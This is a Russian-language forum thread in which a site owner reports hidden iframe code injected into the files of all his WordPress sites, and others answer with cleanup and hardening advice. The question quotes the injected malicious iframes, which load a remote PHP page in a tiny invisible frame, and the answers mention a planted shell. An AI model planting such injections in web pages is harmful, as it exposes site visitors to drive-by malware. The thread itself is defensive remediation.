Question

В файлы на все сайты залез такой код:
<iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe><iframe src="http://www.zw52.ru/wp-content/upgrade/update.php" width="2" height="2" frameborder="0"></iframe>

Сайт начинает работать после удаления данного кода.

Answer 1

проблема вставки данного кода iframe заключается в уязвимости либо самого wordpress, либо какого-нибудь компонента. шелл может находится здесь
./<<DOMAIN>>/wp-content/themes/toolbox/error.php

вычистить можно командой

    find . -type f -name '*.php' -exec perl -pi -e 's/\<iframe\ src\=\"http\:\/\/www.z.*frame\>//g' '{}' \;

Answer 2

1) Блокируй доступ к сайту (deny from all, allow from 127.0.0.1) через штаккесс

2) Выпиливай ифреймы в шаблонах

3) Обновляй cms до последней версии

4) Поставь на сайты какой-нибудь веб-фаирвол подключаемый через auto_prepend_file

5) Не забудь найти на сайте все недавно изменённые файлы. Если найдутся те которые изменяться не должны (типа *.php в дире includes) - замени их на дистрибутивные - в них добавлен бекдор.

Comments

Ты уже который раз упоминаешь про веб-файрволы. Не мог бы подробней рассказать об этом?

---

Аке. Напишу как домой приеду. Я кстати на работку устроился)

---

поздравляю! совсем большой стал 8))